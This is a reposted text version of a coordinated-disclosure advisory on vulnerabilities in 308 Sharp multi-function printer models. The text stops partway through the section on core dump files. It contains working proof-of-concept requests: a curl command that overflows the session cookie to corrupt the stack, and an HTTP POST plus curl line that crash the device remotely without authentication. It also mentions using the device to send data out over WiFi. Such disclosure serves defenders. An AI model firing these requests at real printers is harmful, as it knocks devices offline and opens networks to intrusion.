Sharp Multi-Function Printer 18 Vulnerabilities

Hello, Please find a text-only version below sent to security mailing lists. The complete version on "17 vulnerabilities in Sharp Multi-Function Printers" is posted here: https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html The text version is also posted here: https://pierrekim.github.io/advisories/2024-sharp-mfp.txt === text-version of the advisory === -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ## Advisory Information Title: 17 vulnerabilities in Sharp Multi-Function Printers Advisory URL: https://pierrekim.github.io/advisories/2024-sharp-mfp.txt Blog URL: https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html Date published: 2024-06-27 Vendors contacted: JPCERT Release mode: Released CVE: CVE-2024-28038, CVE-2024-36251, CVE-2024-28955, CVE-2024-29146, CVE-2024-29978, CVE-2024-32151, CVE-2024-33605, CVE-2024-33610, CVE-2024-33610, CVE-2024-35244, CVE-2024-33616, CVE-2024-34162, CVE-2024-36248 ## Product description > Multifunction printers offer more than just print. These devices integrate the power of a printer, photocopier and scanner into one single device. > > From https://www.sharp.co.uk/printers-photocopiers/explore-sharp-printers/sharp-multifunction-printers ## Vulnerability Summary Vulnerable versions: 308 different models of Sharp Multi-Function Printers (MFP) are vulnerable. It is recommended to visit the official Sharp advisory (https://global.sharp/products/copier/info/info_security_2024-05.html) and apply security patches and replace unsupported Multi-Function Printers (MFP) models. The summary of the vulnerabilities is as follows: 1. CVE-2024-28038 - Memory corruption in the main program - Remote Code Execution against the web server without authentication 2. CVE-2024-36251 - Invalid (0x000000d0) pointer dereference - Remote DoS without authentication 3. CVE-2024-28955, CVE-2024-29146, CVE-2024-29978, CVE-2024-32151 - World-readable coredump files and insecure storage of credentials 4. CVE-2024-33605 - Arbitrary Directory Listing without authentication 5. non-assigned CVE vulnerability - Local File Inclusion allowing to read any file (e.g. Coredump files) without authentication 5.1 Generation of the coredump file on the printer 5.2 Local File Inclusion of the coredump file 5.3 Retrieve of credentials using the coredump files 5.4 Retrieve of credentials using configuration files 6. CVE-2024-33610 - Backdoor webpage - Listing of session cookies without authentication 7. non-assigned CVE vulnerability - Configuration webpages reachable without authentication 8. CVE-2024-33610 - Reboot without authentication - Remote DoS 9. CVE-2024-35244 - Backdoor access - Service 10. non-assigned CVE vulnerability - Backdoor access - FSS User 11. non-assigned CVE vulnerability - Insecure default credentials 12. CVE-2024-33616 - Read admin access on telnet 13. non-assigned CVE vulnerability - XSS on all the Sharp printers (login.html) 14. non-assigned CVE vulnerability - XSS on all the Sharp printers (all other HTML pages) 15. CVE-2024-34162 - Exfiltration of LDAP credentials by downgrading the security 16. CVE-2024-36248 - Hardcoded Google API Keys 17. non-assigned CVE vulnerability - Hardcoded Amazon API Keys 18. N-day CVE-2022-45796 - Remote Code Execution TL;DR: An attacker can compromise Sharp Multi-Function Printers using multiple vulnerabilities. List of vulnerable models of Sharp Multi-Function Printers (308 models): BP-30C25, BP-30C25T, BP-30C25Y, BP-30C25Z, BP-30M35, BP-30M31, BP-30M28, BP-30M35T, BP-30M31T, BP-30M28T, BP-50C36, BP-50C31, BP-50C26, BP-50C65, BP-50C55, BP-50C45, BP-50M36, BP-50M31, BP-50M26, BP-50M55, BP-50M50, BP-50M45, BP-55C26, BP-60C45, BP-60C36, BP-60C31, BP-70C36, BP-70C31, BP-70C65, BP-70C55, BP-70C45, BP-70M36, BP-70M31, BP-70M65, BP-70M55, BP-70M45, BP-90C70, BP-90C80, BP-B547WD, BP-B537WR, BP-B550WD, BP-B540WR, BP-70M90, BP-70M75, MX-M1205, MX-M1055, DX-2500N, DX-2000U, MX-2010U, MX-1810U, MX-2314N, MX-2314NR, MX-2630N, MX-3050N A, MX-3050V A, MX-3100N, MX-3100G, MX-2600N, MX-2600G, MX-3101N, MX-2601N, MX-2301N, MX-3111U, MX-2310U, MX-2310R, MX-3115N, MX-2615N, MX-2615 A, MX-3116N, MX-2616N, MX-3551, MX-3051, MX-2651, MX-3570N, MX-3070N, MX-3570V, MX-3070V, MX-3571, MX-3071, MX-3571S, MX-3071S, MX-3610N, MX-3110N, MX-2610N, MX-3110N A, MX-3610NR, MX-3640N, MX-3140N, MX-2640N, MX-3140N A, MX-3640NR, MX-3140NR, MX-2640NR, MX-4050N, MX-3550N, MX-3050N, MX-4050V, MX-3550V, MX-3050V, MX-4060N, MX-3560N, MX-3060N, MX-4060V, MX-3560V, MX-3060V, MX-4061, MX-3561, MX-3061, MX-4061S, MX-3561S, MX-3061S, MX-5001N, MX-5000N, MX-4101N, MX-4100N, MX-5112N, MX-5111N, MX-5110N, MX-4112N, MX-4111N, MX-4110N, MX-5141N A, MX-4140N A, MX-5141N, MX-5140N, MX-4141N, MX-4140N, MX-6050N, MX-5050N, MX-6050V, MX-5050V, MX-6051, MX-5051, MX-4051, MX-6070N A, MX-4070N A, MX-3070N A, MX-6070N, MX-5070N, MX-4070N, MX-6070V A, MX-4070V A, MX-3070V A, MX-6070V, MX-5070V, MX-4070V, MX-6071, MX-5071, MX-4071, MX-6071S, MX-5071S, MX-4071S, MX-7040N, MX-6240N, MX-7500N, MX-6500N, MX-7580N, MX-6580N, MX-8081, MX-7081, MX-8090N, MX-7090N, MX-B400P, MX-B380P, MX-B401, MX-B381, MX-B402, MX-B382, MX-B402P, MX-B382P, MX-B402SC, MX-B382SC, MX-B455W, MX-B355W, MX-B455WT, MX-B355WT, MX-B455WZ, MX-B355WZ, MX-B456WH, MX-B356WH, MX-B456W, MX-B356W, MX-B476WH, MX-B376WH, MX-B476W, MX-B376W, MX-C301W, MX-C301, MX-C304, MX-C303, MX-C304WH, MX-C303WH, MX-C304W, MX-C303W, MX-C312, MX-C311, DX-C311, DX-C311J, MX-C310, DX-C310, MX-C381, DX-C381, MX-C380, MX-C381B, MX-C400P, MX-C380P, MX-C401, DX-C401, DX-C401 J, MX-C400, DX-C400, MX-C402SC, MX-C382SC, MX-C382SCB, MX-M1204, MX-M1054, MX-M904, MX-M1206, MX-M1056, MX-M2630, MX-M2630 A, MX-M266N, MX-M265N, MX-M265U, MX-M266NV, MX-M265NV, MX-M265UV, MX-M3050 A, MX-M314NV, MX-M264NV, MX-M315NE, MX-M265NE, MX-M315NE, MX-M265NE, MX-M315V, MX-M265V, MX-M354N, MX-M314N, MX-M264N, MX-M354NR, MX-M314NR, MX-M264NR, MX-M354U, MX-M314U, MX-M264U, MX-M3550, MX-M3050, MX-M3551, MX-M3051, MX-M2651, MX-M356N, MX-M316N, MX-M315N, MX-M356U, MX-M315U, MX-M356NV, MX-M316NV, MX-M315NV, MX-M356UV, MX-M315UV, MX-M3570, MX-M3070, MX-M3571, MX-M3071, MX-M3571S, MX-M3071S, MX-M465N A, MX-M365N A, MX-M503N, MX-M453N, MX-M363N, MX-M283N, MX-M503U, MX-M453U, MX-M363U, MX-M564N, MX-M464N, MX-M364N, MX-M564N A, MX-M565N, MX-M465N, MX-M365N, MX-M6050, MX-M5050, MX-M4050, MX-M6051, MX-M5051, MX-M4051, MX-M6070 A, MX-M4070 A, MX-M3070 A, MX-M6070, MX-M5070, MX-M4070, MX-M6071, MX-M5071, MX-M4071, MX-M6071S, MX-M5071S, MX-M4071S, MX-M753N, MX-M753U, MX-M623N, MX-M623U, MX-M754N, MX-M654N, MX-M754N A, MX-M654N A, MX-M7570, MX-M6570, MX-M905. _Miscellaneous notes_: This security assessment was entirely done using a blackbox approach and fully-remote - I only had some IPs of printers (no physical access and no credentials for admin or normal users). Consequently, the physical security of the printers was not analyzed and the vulnerabilities were confirmed with about 15 different models running the latest firmware versions (MX-3060N, MX-3061, MX-3070N, MX-3560N, MX-3561, MX-5070V, MX-5071, MX-C3051R MX-C3081R, MX-M365N, MX-M453U, MX-M465N, MX-M5050, MX-M5051, MX-M6051 and MX-M6071). The vulnerabilities were communicated to JPCERT on June 1, 2023 and communications with JPCERT were very effective - they fully managed interactions with Sharp. _Impacts_ An attacker can compromise Sharp multi-function printers (MFP) and execute code. These printers are running Linux and are powerful. They are ideal to host implants (and fun programs, like Bettercap) and move laterally inside infrastructures. _Recommendations_ - - Use network segmentation to isolate MFPs. - - Apply security patches. - - Replace unsupported MFPs. ## Details - Memory corruption in the main program - Remote Code Execution against the web server without authentication By Default, Sharp printers are using a single super-program that will run as root and provide network daemons (ftp, http, snmp, raw-printer-9100, ...). This single program is vulnerable to a stack-based buffer overflow without authentication. This `main` program runs as root and its HTTP stack is vulnerable, without authentication, to a stack-based buffer overflow, allowing an attacker to redirect the control flow of the program and achieve remote code execution. `main` program listening on port 80/tcp: sh-4.3# ps -auxww | grep main root 1186 6.3 5.3 2124656 172688 ? Sl 00:27 43:36 /tmp/app/ui/ui_mainview -hidecursor root 2081 3.9 10.9 2515532 348980 ? Sl 00:27 26:52 /tmp/main/main -cpu=1 -stack=8000 -fifo -nosigmask -nodlychk root 13598 0.0 0.0 1980 368 pts/0 S+ 11:49 0:00 grep main sh-4.3# netstat -laputen | grep main tcp 0 0 0.0.0.0:50001 0.0.0.0:* LISTEN 0 10217 2081/main tcp6 0 0 :::443 :::* LISTEN 0 12538 2081/main tcp6 0 0 :::52000 :::* LISTEN 0 33214 2081/main tcp6 0 0 :::10080 :::* LISTEN 0 18542 2081/main tcp6 0 0 :::515 :::* LISTEN 0 10166 2081/main tcp6 0 0 :::53000 :::* LISTEN 0 12539 2081/main tcp6 0 0 :::10443 :::* LISTEN 0 18545 2081/main tcp6 0 0 :::5900 :::* LISTEN 0 33233 2081/main tcp6 0 0 :::9100 :::* LISTEN 0 12534 2081/main tcp6 0 0 :::80 :::* LISTEN 0 12537 2081/main tcp6 0 0 :::21 :::* LISTEN 0 10164 2081/main tcp6 0 0 :::631 :::* LISTEN 0 10168 2081/main udp 0 0 127.0.0.1:9473 0.0.0.0:* 0 13202 2081/main udp6 0 0 :::5353 :::* 0 12497 2081/main udp6 0 0 :::161 :::* 0 33229 2081/main udp6 0 0 :::546 :::* 0 33145 2081/main sh-4.3# By default, the printer will provide a MFPSESSIONID cookie when reaching the printer with a browser as shown below. This cookie will then be used for authentication purposes if the user decides to log into the printer. For example, with a HTTP request to /main.html: kali% curl -kv http://10.0.0.1/main.html | head % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /main.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > < HTTP/1.1 200 OK < Server: Rapid Logic/1.1 < MIME-version: 1.0 < Date: Thu Jan 1 02:32:35 1970 GMT < Content-Type: text/html; charset=UTF-8 < Transfer-Encoding: chunked < Connection: close < Pragma: no-cache < Cache-Control: no-cache < X-Frame-Options: DENY < Set-Cookie: MFPSESSIONID=020015D2C59E7B68C9FB5F411B0E59FCBEF70F7E03CEE4C4C5A12023051115051847BC555A < Extend-sharp-setting-status: 0 < { [2 bytes data] <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=320,initial-scale=1.0" /> <meta name="format-detection" content="telephone=no" /> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=10; IE=11" /> <title>Machine Identification - MX-M6071</title> <link rel="stylesheet" href="other.css" type="text/css" /> <link rel="stylesheet" href="color1.css" type="text/css" /> * Failure writing output to destination * Failed reading the chunked-encoded stream 100 6950 0 6950 0 0 196k 0 --:--:-- --:--:-- --:--:-- 199k * Closing connection 0 curl: (23) Failure writing output to destination kali% By sending a malicious HTTP request with a long MFPSESSIONID cookie, it is possible to overwrite the stack of the main program. This payload will send a MFPSESSIONID cookie with a payload of 643 bytes. This payload will overwrite a stack buffer inside the main program. The buffer is probably 639 bytes and `EDBB` will overwrite the stack: kali% var=`perl -e "print 'A'x639"`; curl -v -b "MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html * Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /system.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB > If /system.html does not exist, it is possible to use /main.html or any existing html webpage instead: kali% var=`perl -e "print 'A'x639"`; curl -v -b "MFPSESSIONID=${var}EDCB" http://10.0.0.1/main.html * Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /system.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB > If the first exploitation does not work, it is possible to resend it again to overwrite the stack the second time: kali% var=`perl -e "print 'A'x639"`; curl -v -b "MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html * Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /system.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB kali% var=`perl -e "print 'A'x639"`; curl -v -b "MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html * Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /system.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB The `dmesg` output on the printer will confirm that the main program crashed while trying to reach the address 0x42434445, corresponding to the previous `EDCB` sent inside the cookie. `EDCB` is represented in the little-endian format as ARM is little-endian and 0x42434445 can be found inside several registers (but not PC). output of `dmesg`: [ 127.970220] main[15612]: unhandled level 2 translation fault (11) at 0x42434445, esr 0x92000006 [ 127.979463] pgd = ffff80007a07e000 [ 127.982981] [42434445] *pgd=00000000fa099003, *pud=00000008c6f9d003, *pmd=0000000000000000 [ 127.992811] CPU: 1 PID: 15612 Comm: main Tainted: P O 4.1.46-rt52 #2 [ 128.000296] Hardware name: LS1043A MFP Board (DT) [ 128.005195] task: ffff8008372c69c0 ti: ffff80083dde0000 task.ti: ffff80083dde0000 [ 128.012710] PC is at 0x20d4ff8 [ 128.015761] LR is at 0x2a0 [ 128.018465] pc : [<00000000020d4ff8>] lr : [<00000000000002a0>] pstate: 900f0010 [ 128.026024] sp : 000000008f12f7c0 [ 128.029335] x12: 0000000042434445 [ 128.032981] x11: 000000008fd45008 x10: 0000000000000001 [ 128.038298] x9 : 0000000091247bf8 x8 : 000000008fd5648c [ 128.043678] x7 : 0000000000000000 x6 : 000000008fd56c58 [ 128.048996] x5 : 000000008fd569bc x4 : 0000000008b90bdc [ 128.054388] x3 : 0000000042434445 x2 : 0000000042434445 [ 128.059834] x1 : 000000008fd569b8 x0 : 0000000000000001 On the printer, using GDB, we will confirm the main program crashed and the stack has been successfully corrupted: sh-4.3# ps -auxww|grep main root 1186 9.7 4.9 2123632 158080 ? Sl 11:31 0:21 /tmp/app/ui/ui_mainview -hidecursor root 2023 7.8 9.8 2505880 316360 ? Sl 11:31 0:15 /tmp/main/main -cpu=1 -stack=8000 -fifo -nosigmask -nodlychk root 26544 0.0 0.0 1980 376 pts/0 S+ 11:34 0:00 grep main sh-4.3# gdb -p 2023 GNU gdb (GDB) 7.10.1.20160210-cvs warning: File "/lib/libthread_db-1.0.so" auto-loading has been declined by your `auto-load safe-path' set to "$debugdir:$datadir/auto-load". warning: Unable to find libthread_db matching inferior's thread library, thread debugging will not be available. 0xf744f1c4 in pthread_join () from /lib/libpthread.so.0 (gdb) c ... [LWP 32749 exited] [New LWP 32750] [New LWP 32751] [LWP 32751 exited] [New LWP 32752] ... [New LWP 27196] [LWP 27196 exited] [New LWP 27197] Program received signal SIGSEGV, Segmentation fault. [Switching to LWP 27195] 0x020d4ff8 in ?? () (gdb) bt #0 0x020d4ff8 in ?? () #1 0x000002a0 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) info reg r0 0x1 1 r1 0x903e0ec8 2419986120 r2 0x42434445 1111704645 r3 0x42434445 1111704645 r4 0x8b90bdc 146344924 r5 0x903e0ecc 2419986124 r6 0x903e1168 2419986792 r7 0x0 0 r8 0x903e082c 2419984428 r9 0x918ddcb8 2441993400 r10 0x1 1 r11 0x903db008 2419961864 r12 0x42434445 1111704645 sp 0x72231fc0 0x72231fc0 lr 0x2a0 672 pc 0x20d4ff8 0x20d4ff8 cpsr 0x90050010 -1878720496 (gdb) info frame Stack level 0, frame at 0x72231fc0: pc = 0x20d4ff8; saved pc = 0x2a0 called by frame at 0x72231fc0 Arglist at 0x72231fc0, args: Locals at 0x72231fc0, Previous frame's sp is 0x72231fc0 (gdb) There is no ASLR in the `main` program; the addresses are always identical therefore exploitation is very likely. Exploitation was not attempted since no enough time was allocated to develop such exploit during this security assessment and I already had a remote shell as root on the printers. Sharp confirmed that exploitation is possible. An attacker with a RCE vulnerability can then move laterally and use Wifi to exfiltrate information: bash-4.3# iwlist ath0 scan ath0 Scan completed : Cell 01 - Address: 00:3C:10:01:02:03 ESSID:"[REDACTED]" Mode:Master Frequency:2.412 GHz (Channel 1) Quality=93/94 Signal level=-54 dBm Noise level=-95 dBm Encryption key:off Bit Rates:12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s; 48 Mb/s 54 Mb/s Extra:bcn_int=100 bash-4.3# ## Details - Invalid (0x000000d0) pointer dereference - Remote DoS without authentication It was observed that the `/billcodedef_sub_sel.html` webpage is reachable without authentication on Sharp printers. A specific request to this webpage will trigger an invalid pointer deference in the main program. The printer will then reboot after creating coredump files. [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] When submitting the request with the Sub Code `test` by pressing `Search Start(Q)`, the HTTP request will be: HTTP request using the HTML form from `billcodedef_sub_sel.html`: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] It is possible to modify the HTTP request to change `curr_page_url=%2Fbillcodedef_sub_sel.html` to `curr_page_url=%2Fbillcodedef_sub_sel.html?`. A question mark was added after `billcodedef_sub_sel.html`. The resulting request will be: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] The corresponding malicious HTTP request to trigger the DoS is: POST /billcodedef_sub_sel.html? HTTP/1.1 Host: 10.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 406 Origin: http://10.0.0.1 Connection: close Referer: http://10.0.0.1/billcodedef_sub_sel.html? Cookie: MFPSESSIONID=020035B15A47378CF80C6175263F714EEF9118E72A1AA6C9CAC6202305181146331E5FF54; sideBarflag=1 Upgrade-Insecure-Requests: 1 billing_code_def_selWebchg=&action=searchbtn&ordinate=0&token2=AEC039F52DC886D169AC7F977F61D4C61295539BC0A3572B08E37FB291B9A766E238FB699426F67B&ggt_textbox%288%29=test&ggt_textbox%2811%29=&ggt_select%2829%29=1&billing_radio=2%2C&BillingCode%282%2C%29=Not+Set&BillingCodeName%28%29=&ggt_hidden%2839%29=0&ggt_hidden%2840%29=1&ggt_hidden%2844%29=&curr_page_url=%2Fbillcodedef_sub_sel.html?&selBillingCodeName= We can also reproduce the issue using curl: kali% curl -i -s -k -X $'POST' -H $'Host: 10.0.0.1' --data-binary 'curr_page_url=%2Fbillcodedef_sub_sel.html?' 'http://10.0.0.1/billcodedef_sub_sel.html' On the printer, we can see a crash: [ 9914.440518] main[18602]: unhandled level 3 translation fault (11) at 0x000000d0, esr 0x92000007 [ 9914.453538] pgd = ffff80082f408000 [ 9914.456936] [000000d0] *pgd=00000000f9ea6003, *pud=00000000f9f6e003, *pmd=00000000f9c0f003, *pte=0000000000000000 [ 9914.468751] CPU: 1 PID: 18602 Comm: main Tainted: P O 4.1.46-rt52 #2 [ 9914.476433] Hardware name: LS1043A MFP Board (DT) [ 9914.481138] task: ffff80083de6c680 ti: ffff80082cb20000 task.ti: ffff80082cb20000 [ 9914.488691] PC is at 0x228fe6c [ 9914.491744] LR is at 0x228f820 [ 9914.494830] pc : [<000000000228fe6c>] lr : [<000000000228f820>] pstate: 600f0010 [ 9914.502227] sp : 000000007212fd70 [ 9914.505539] x12: 00000000ffffffff [ 9914.508939] x11: 000000007212fdb0 x10: 0000000000000001 [ 9914.514367] x9 : 0000000091170990 x8 : 0000000000000002 [ 9914.519683] x7 : 000000007212fd88 x6 : 0000000091172799 [ 9914.525102] x5 : 0000000000000000 x4 : 0000000000000000 [ 9914.530417] x3 : 0000000000000000 x2 : 000000007212fdd0 [ 9914.535764] x1 : 0000000000000061 x0 : 0000000000000000 [ 9914.543566] [BSPIF]bspif_pof_wait:signal receive(-512) [ 9914.548702] [BSPIF]bspif_pof_wait: [ 9988.116784] Panic : Oops Exit !!! [comm:irq/20-serial] [user_mode:0] With the creation of the corresponding coredump files: sh-4.3# cd /mnt/log && ls -latr [...] -rw-r--r-- 1 root root 19133981 May 18 11:48 core-main.log.gz.001 -rw-r--r-- 1 root root 0 May 18 11:48 ERR_IFS.log -rw-r--r-- 1 root root 19133981 May 18 11:48 ERR_core-main.log.gz -rw-r--r-- 1 root root 97230 May 18 11:48 ERR_kern.log -rw-r--r-- 1 root root 0 May 18 11:48 ERR_core-pdl.log.gz -rw-r--r-- 1 root root 0 May 18 11:48 ERR_log_ui_mainview.log -rw-r--r-- 1 root root 21262 May 18 11:48 ERR_pdl.log -rw-r--r-- 1 root root 315 May 18 11:48 ERR_nf.log -rw-r--r-- 1 root root 314620 May 18 11:48 ERR_main.log -rw-r--r-- 1 root root 97363 May 18 11:48 kern.log.001 -rw-r--r-- 1 root root 18653 May 18 11:48 vmstat.log.001 -rw-r--r-- 1 root root 377 May 18 11:48 umount.log.001 -rw-r--r-- 1 root root 1861 May 18 11:48 slinkerr1.log -rw-r--r-- 1 root root 4582 May 18 11:48 slinkerr0.log -rw-r--r-- 1 root root 45625 May 18 11:48 watch_idle.log -rw-r--r-- 1 root root 314692 May 18 11:49 main.log -rw-r--r-- 1 root root 132 May 18 11:49 bsp.log -rw-r--r-- 1 root root 96435 May 18 11:49 kern.log -rw-r--r-- 1 root root 407 May 18 11:49 vmstat.log sh-4.3# date Thu May 18 11:50:40 UTC 2023 sh-4.3# uptime 11:51:55 up 3 min, 0 users, load average: 1.36, 0.95, 0.40 sh-4.3# ## Details - World-readable coredump files and insecure storage of credentials It was observed that the coredump files located in the Sharp printers have incorrect permissions. Any local user can read them. These coredump files contain all the clear-text credentials of the users. Core files present in /mnt/log: sh-4.3# ls -la /mnt/log | grep core -rw-r--r-- 1 root root 16120921 May 11 15:18 ERR_core-main.log.gz -rw-r--r-- 1 root root 0 May 11 15:18 ERR_core-pdl.log.gz -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-IFS.log.gz -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-IFS.log.gz.001 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-IFS.log.gz.002 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-NX.log.gz -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-NX.log.gz.001 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-NX.log.gz.002 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-bcr_iface.log.gz -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-bcr_iface.log.gz.001 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-bcr_iface.log.gz.002 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-main.log.gz -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-main.log.gz.001 ... -rw-r--r-- 1 root root 0 Jan 1 2000 core-main.log.gz -rw-r--r-- 1 root root 16120921 May 11 15:18 core-main.log.gz.001 -rw-r--r-- 1 root root 13566117 May 11 15:16 core-main.log.gz.002 -rw-r--r-- 1 root root 17158453 May 11 15:12 core-main.log.gz.003 -rw-r--r-- 1 root root 17332354 May 11 12:32 core-main.log.gz.004 -rw-r--r-- 1 root root 20440117 May 11 12:28 core-main.log.gz.005 -rw-r--r-- 1 root root 22170528 May 10 11:47 core-main.log.gz.006 -rw-r--r-- 